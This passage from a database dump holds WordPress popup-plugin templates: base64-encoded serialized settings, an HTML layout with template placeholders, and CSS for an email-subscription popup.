iJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjEwMjp7czo1OiJ3aWR0aCI7czozOiI3NzAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czo0MzoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYmctZm9ybS1tYWluLnBuZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjYWFhYWFhIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czozOToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnV0dG9uLTEucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czo0MDoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvZm9ybS1ib29rLnBuZyI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjZThlOGU4IjtzOjk6ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czo4ODoiW1BQU19TSVRFX1VSTF13cC1jb250ZW50L3VwbG9hZHMvMjAxNi8xMS81X2NocmlzY2h1bmdfaG9uZ2tvbmdwYXJrLTEtMS0xLTEtMi0xLTEtMS0yLmpwZyI7czoxMDoiYmdfY29sb3JfMyI7czo3OiIjNTFkY2RlIjtzOjk6ImJnX3R5cGVfNCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfNCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzQiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzUiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzUiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl81IjtzOjc6IiM4NDg0ODQiO3M6OToiYmdfdHlwZV82IjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ182IjtzOjA6IiI7czoxMDoiYmdfY29sb3JfNiI7czo3OiIjNTFkY2RlIjtzOjEwOiJmb250X2xhYmVsIjtzOjEwOiJNb250c2VycmF0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiM0ZDRjNGMiO3M6MTA6ImZvbnRfdHh0XzAiO3M6MTA6Ik1vbnRzZXJyYXQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiM0ZDRjNGMiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjEwOiJNb250c2VycmF0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjOTc5Njk2IjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjQ6Im5vbmUiO3M6NzoiYnVsbGV0cyI7czoxNDoiY2lyY2xlX2JpZ19uZXciO3M6MTk6ImxheWVyX3JlbF9zZWxlY3RvcnMiO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTMxOiJHZXQgaXQgPHNwYW4gY2xhc3M9XCJwcHNIZWFkZXJUeHQyXCI+Tk9XITwvc3Bhbj4gSW5jcmVhc2UgbW9yZSB0aGFuIDxzcGFuIGNsYXNzPVwicHBzSGVhZGVyVHh0MlwiPjcwMCU8L3NwYW4+IG9mIEVtYWlsIFN1YnNjcmliZXJzISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE3OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6NDoiZmFkZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czo0OiIxMDAwIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxNDoic3ViX3Y2X2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfeW1scF9hcGlfa2V5IjtzOjA6IiI7czoxMzoic3ViX3ltbHBfbmFtZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7czoxMDoic2V0X3ByZXNldCI7czowOiIiO31zOjU6ImVtYWlsIjthOjg6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czoxMDoic2V0X3ByZXNldCI7czowOiIiO3M6MzoiZW5iIjtzOjE6IjEiO319czo5OiJibGFja2xpc3QiO3M6MDoiIjtzOjE1OiJibGFja2xpc3RfZXJyb3IiO3M6MjY6IllvdXIgZW1haWwgaXMgaW4gYmxhY2tsaXN0IjtzOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjExOiJHZXQgaXQgbm93ISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfc3ViamVjdCI7czoyODoiTmV3IHN1YnNjcmliZXIgb24gW3NpdGVuYW1lXSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6NToiTG9naW4iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjI3OiJUaGFuayB5b3UgZm9yIHJlZ2lzdHJhdGlvbiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gcmVnaXN0cmF0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NjoiWW91IHJlZ2lzdGVyZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgcmVnaXN0cmF0aW9uLiBJZiB5b3UgZGlkIG5vdCByZWdpc3RlciBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjEyMToiWW91IGhhdmUgbmV3IG1lbWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIG1lbWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxMjoic3RhdF9nYV9jb2RlIjtzOjA6IiI7czo1OiJ0eHRfMCI7czoxNzM6IjxwPlBvcHVwIGJ5IFN1cHN5c3RpYyBsZXRzIHlvdSBlYXNpbHkgY3JlYXRlIGVsZWdhbnQgb3ZlcmxhcHBpbmcgd2luZG93cyB3aXRoIHVubGltaXRlZCBmZWF0dXJlcy4gUG9wLXVwcyB3aXRoIFNsaWRlciwgTGlnaHRib3gsIENvbnRhY3QgYW5kIFN1YnNjcmlwdGlvbiBmb3JtcyBhbmQgbW9yZS48L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiI3IjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link href=\"https://fonts.googleapis.com/css?family=Montserrat\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupListsInner\">\r\n		<div class=\"ppsPopupTblCols\">\r\n			<div class=\"ppsPopupLeftCol\">\r\n				[if bg_type_2 == \"img\"]\r\n				<img src=\"[bg_img_2]\" />\r\n				[endif]\r\n			</div>\r\n			<div class=\"ppsPopupRightCol\">\r\n				<div class=\"ppsBigArrow\"></div>\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupTxt_0\">[txt_0]</div>\r\n				[endif]\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						<div class=\"ppsFormWrap\">\r\n						[sub_fields_html]\r\n						</div><!--\r\n						--><input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	font-size: 14px;\r\n  	[if bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupListsInner {\r\n  	[if bg_type_0 == \"color\"]\r\n	background: {{ adjust_brightness(popup.params.tpl.bg_color_0, 255) }}; /* Old browsers */\r\n	background: -moz-linear-gradient(top,  {{ adjust_brightness(popup.params.tpl.bg_color_0, 255) }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 125) }} 50%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 60) }} 75%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 0) }} 100%); /* FF3.6-15 */\r\n	background: -webkit-linear-gradient(top,  {{ adjust_brightness(popup.params.tpl.bg_color_0, 255) }} 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 125) }} 50%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 60) }} 75%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 0) }} 100%); /* Chrome10-25,Safari5.1-6 */\r\n	background: linear-gradient(to bottom,  {{ adjust_brightness(popup.params.tpl.bg_color_0, 255) }} 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 125) }} 50%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 60) }} 75%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 0) }} 100%); /* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 255) }}\", endColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 0) }}\",GradientType=0 ); /* IE6-9 */\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTblCols {\r\n	display: table;\r\n  	padding: 10px 10px 10px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLeftCol {\r\n	display: table-cell;\r\n  	[if enb_subscribe]\r\n  	width: 30%;\r\n  	[else]\r\n  	width: 30%;\r\n  	min-height: 60%;\r\n  	[endif]\r\n  	vertical-align: middle;\r\n    text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol {\r\n  	width: 70%;\r\n	display: table-cell;\r\n  	border-radius: 8px;\r\n	-moz-border-radius: 8px;\r\n	-webkit-border-radius: 8px;\r\n  	margin: 8px 5px 5px 5px;\r\n  	text-align: left;\r\n  	padding: 30px 0 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-moz-placeholder { /* Firefox 19+ */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-ms-input-placeholder { /* IE 10+ */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-moz-placeholder { /* Firefox 18- */\r\n    color: #838383;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-moz-placeholder { /* Firefox 19+ */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-ms-input-placeholder { /* IE 10+ */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-moz-placeholder { /* Firefox 18- */\r\n    color: #838383;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 0 0;\r\n  	text-align: left;\r\n    position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsFormWrap {\r\n	display:inline-block;\r\n	width: 60%;\r\n	vertical-align: bottom;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"password\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	border: 1px solid transparent;\r\n	width: 100%;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	display:block;\r\n    font-size: 17px;\r\n	font-weight: normal;\r\n    color: #636363;\r\n	padding: 0 0 0 10px;\r\n	height: 40px;\r\n	margin: 10px 0 0 0;\r\n	\r\n  	[if bg_type_1 == \"img\"]\r\n  	background: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[else]\r\n  	background: [bg_color_1];\r\n  	[endif]\r\n  	\r\n  	[if bg_type_5 == \"color\"]\r\n  	color: [bg_color_5];\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n	padding-top: 9px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	display: block;\r\n	font-size: 17px;\r\n	color: #636363;\r\n	margin-top: 10px;\r\n	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: block;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	[if bg_type_3 == \"color\"]\r\n  	background: [bg_color_3];\r\n	background-image: none;\r\n  	[elseif bg_type_3 == \"img\"]\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n  	[if bg_type_4 == \"color\"]\r\n  	color: [bg_color_4];\r\n  	[endif]\r\n	\r\n    font-size: 17px;\r\n	font-weight: normal;\r\n  	cursor: pointer;\r\n  	width:  auto;\r\n    text-transform: uppercase;\r\n  	padding: 0px 20px;\r\n	height: 40px;\r\n	display:inline-block;\r\n	border: 1px solid transparent;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	vertical-align: bottom;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	right: -5px;\r\n	top: 2px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 .ppsTxtContent {\r\n	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 p {\r\n	margin: 0;\r\n	padding: 0;\r\n	font-family: Montserrat;\r\n	font-size: 16px;\r\n    line-height: 24px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	width: 90%;\r\n  	color: #4d4c4c;\r\n  	display: block;\r\n  	margin: 27px 0 0;\r\n    padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol .ppsHeaderTxt2 {\r\n  	[if bg_type_6 == \"color\"]\r\n  	color: [bg_color_6] !important;\r\n  	[endif]\r\n	margin: 0;\r\n    padding: 0;\r\n	font-weight: bold;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #4d4c4c;\r\n	line-height: 1.2;\r\n	margin: 0 10px 0 0;\r\n	color: #4d4c4c;\r\n	font-family: Montserrat;\r\n	font-size: 25px;\r\n    font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n  	[if enb_subscribe]\r\n    color: #000000;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n  	margin-left: 10px;\r\n  	[else]\r\n  	margin-top: 10px;\r\n  	color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n    margin-left: 10px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	[if enb_subscribe]\r\n  	[else]\r\n  	margin-top: 130px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] li{\r\n	font-weight: bold;\r\n  	font-size: 13px;\r\n  	padding-top: 3px;\r\n	padding-bottom: 3px;\r\n  	color: #737E86;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n	width: 100%;\r\n}\r\n','smart2_p4.png',1,1,1,1,0,0,0,'2015-01-13 18:22:48',1,0),(44,'Christmas Mistletoe',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMzoib3ZlcmxheV9jbGljayI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9